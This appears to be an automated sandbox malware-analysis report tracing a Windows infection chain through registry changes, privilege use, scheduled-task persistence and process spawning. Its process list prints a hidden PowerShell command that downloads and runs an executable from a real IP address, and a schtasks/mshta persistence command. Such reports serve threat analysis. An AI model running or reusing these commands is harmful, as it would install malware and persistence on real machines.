N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133850873044091225" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036490101\45d700a7e2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036490101\45d700a7e2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe N/A
N/A N/A C:\ProgramData\rsxrj\oqftxb.exe N/A
N/A N/A C:\ProgramData\rsxrj\oqftxb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036560101\1d12573256.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036560101\1d12573256.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036570101\3c3e7e563d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036570101\3c3e7e563d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036580101\5e972f7dcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036580101\5e972f7dcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036570101\3c3e7e563d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036570101\3c3e7e563d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036570101\3c3e7e563d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036570101\3c3e7e563d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036590101\7axE6Jz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036590101\7axE6Jz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036590101\7axE6Jz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036590101\7axE6Jz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036600101\6NPpGdC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036600101\6NPpGdC.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10036610101\0frhMAb.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035810101\942382b6ad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035810101\942382b6ad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035810101\942382b6ad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A N/A N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035810101\942382b6ad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035810101\942382b6ad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035810101\942382b6ad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3012 wrote to memory of 1064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3012 wrote to memory of 1064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1064 wrote to memory of 3588 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1064 wrote to memory of 3588 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1064 wrote to memory of 3536 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1064 wrote to memory of 3536 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3536 wrote to memory of 1328 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3536 wrote to memory of 1328 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1064 wrote to memory of 2804 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1064 wrote to memory of 2804 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2804 wrote to memory of 3932 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2804 wrote to memory of 3932 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1064 wrote to memory of 4012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1064 wrote to memory of 4012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4012 wrote to memory of 1528 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4012 wrote to memory of 1528 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1064 wrote to memory of 2808 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1064 wrote to memory of 2808 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1064 wrote to memory of 2148 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 1064 wrote to memory of 2148 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 2148 wrote to memory of 4064 N/A C:\Windows\system32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2148 wrote to memory of 4064 N/A C:\Windows\system32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4064 wrote to memory of 1428 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
PID 4064 wrote to memory of 1428 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
PID 4064 wrote to memory of 1428 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
PID 1428 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 1428 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 1428 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2780 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe
PID 2780 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe
PID 2780 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe
PID 2780 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10035810101\942382b6ad.exe
PID 2780 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10035810101\942382b6ad.exe
PID 2780 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10035810101\942382b6ad.exe
PID 2192 wrote to memory of 4628 N/A C:\Users\Admin\AppData\Local\Temp\10035810101\942382b6ad.exe C:\Windows\SysWOW64\cmd.exe
PID 2192 wrote to memory of 4628 N/A C:\Users\Admin\AppData\Local\Temp\10035810101\942382b6ad.exe C:\Windows\SysWOW64\cmd.exe
PID 2192 wrote to memory of 4628 N/A C:\Users\Admin\AppData\Local\Temp\10035810101\942382b6ad.exe C:\Windows\SysWOW64\cmd.exe
PID 2192 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\10035810101\942382b6ad.exe C:\Windows\SysWOW64\mshta.exe
PID 2192 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\10035810101\942382b6ad.exe C:\Windows\SysWOW64\mshta.exe
PID 2192 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\10035810101\942382b6ad.exe C:\Windows\SysWOW64\mshta.exe
PID 4628 wrote to memory of 464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4628 wrote to memory of 464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4628 wrote to memory of 464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1784 wrote to memory of 2424 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1784 wrote to memory of 2424 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1784 wrote to memory of 2424 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2780 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 2780 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 2780 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 1064 wrote to memory of 3140 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1064 wrote to memory of 3140 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1064 wrote to memory of 3140 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3140 wrote to memory of 840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3140 wrote to memory of 840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3140 wrote to memory of 840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 840 wrote to memory of 4008 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 840 wrote to memory of 4008 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 840 wrote to memory of 4008 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2424 wrote to memory of 3368 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempUZ8JFEPJWMOG5IKEJHERG5Z85NJRUEFV.EXE
PID 2424 wrote to memory of 3368 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempUZ8JFEPJWMOG5IKEJHERG5Z85NJRUEFV.EXE
PID 2424 wrote to memory of 3368 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempUZ8JFEPJWMOG5IKEJHERG5Z85NJRUEFV.EXE
PID 3140 wrote to memory of 1800 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3140 wrote to memory of 1800 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3140 wrote to memory of 1800 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\quarantine\am_no.bat"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\quarantine\am_no.bat" any_word

C:\Windows\system32\timeout.exe

timeout /t 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\system32\schtasks.exe

schtasks /create /tn "vp4tdmap9rK" /tr "mshta \"C:\Temp\yJ5bncm9F.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\system32\mshta.exe

mshta "C:\Temp\yJ5bncm9F.hta"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe

